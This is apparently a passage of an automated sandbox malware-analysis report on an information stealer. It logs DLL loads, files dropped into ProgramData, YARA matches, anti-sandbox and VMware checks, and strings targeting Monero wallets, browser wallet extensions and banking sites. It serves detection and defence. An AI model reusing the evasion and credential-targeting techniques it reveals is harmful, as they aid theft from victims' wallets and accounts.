Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: pcacli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntshrui.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: linkinfo.dll
Source: C:\ProgramData\CBFCFBFBFB.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: freebl3.pdb source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr
Source: Binary string: freebl3.pdbp source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr
Source: Binary string: softokn3.pdb@ source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000004.00000002.2221135617.000000003823A000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000004.00000002.2215082591.000000002C352000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source: Binary string: nss3.pdb source: MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr
Source: Binary string: softokn3.pdb source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_00418950
Source: freebl3.dll.4.dr Static PE information: section name: .00cfg
Source: mozglue.dll.4.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.4.dr Static PE information: section name: .didat
Source: softokn3.dll.4.dr Static PE information: section name: .00cfg
Source: nss3.dll.4.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0066701A push ecx; ret 0_2_0066702D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006171D0 push ecx; ret 0_2_006171E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006673E8 push cs; ret 0_2_006673E9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006673B8 push esp; retn 0003h 0_2_006673BD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006699ED push 0000004Ch; iretd 0_2_006699FE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00655C8D push ecx; ret 0_2_00655CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0042F142 push ecx; ret 4_2_0042F155
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00422D3B push esi; ret 4_2_00422D3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0041DDB5 push ecx; ret 4_2_0041DDC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00432715 push 0000004Ch; iretd 4_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C8BB536 push ecx; ret 4_2_6C8BB549
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 13_2_00B6686B push edx; ret 13_2_00B66873
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 13_2_00AF71D0 push ecx; ret 13_2_00AF71E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\nss3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\CBFCFBFBFB.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\a43486128347[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\CBFCFBFBFB.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_00418950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: 0.2.file.exe.638ad8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.638ad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3636, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR
Source: c:\users\user\desktop\file.exe Event Logs and Signature results: Application crash and keyboard check
Source: file.exe, MSBuild.exe Binary or memory string: DIR_WATCH.DLL
Source: file.exe, MSBuild.exe Binary or memory string: SBIEDLL.DLL
Source: file.exe, MSBuild.exe Binary or memory string: API_LOG.DLL
Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:07:4116:07:4116:07:4116:07:4116:07:4116:07:41DELAYS.TMP%S%SNTDLL.DLL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos, 4_2_0040180D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\file.exe API coverage: 1.6 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API coverage: 7.8 %
Source: C:\ProgramData\CBFCFBFBFB.exe API coverage: 1.7 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6052 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 4420 Thread sleep count: 78 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh 4_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0062735B FindFirstFileExW, 0_2_0062735B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 4_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose, 4_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 4_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 4_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 4_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 4_2_0040CD37
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 13_2_00B0735B FindFirstFileExW, 13_2_00B0735B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 4_2_00415142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00410FBA GetSystemInfo,wsprintfA, 4_2_00410FBA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: Amcache.hve.7.dr Binary or memory string: VMware
Source: BFCGDA.4.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: BFCGDA.4.dr Binary or memory string: AMC password management pageVMware20,11696494690
Source: BFCGDA.4.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: BFCGDA.4.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: BFCGDA.4.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: BFCGDA.4.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Amcache.hve.7.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: BFCGDA.4.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.0000000001373000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: BFCGDA.4.dr Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Amcache.hve.7.dr Binary or memory string: vmci.sys
Source: BFCGDA.4.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: BFCGDA.4.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: BFCGDA.4.dr Binary or memory string: global block list test formVMware20,11696494690
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Amcache.hve.7.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: BFCGDA.4.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Amcache.hve.7.dr Binary or memory string: VMware VMCI Bus Device
Source: MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(=7
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual RAM
Source: BFCGDA.4.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: BFCGDA.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
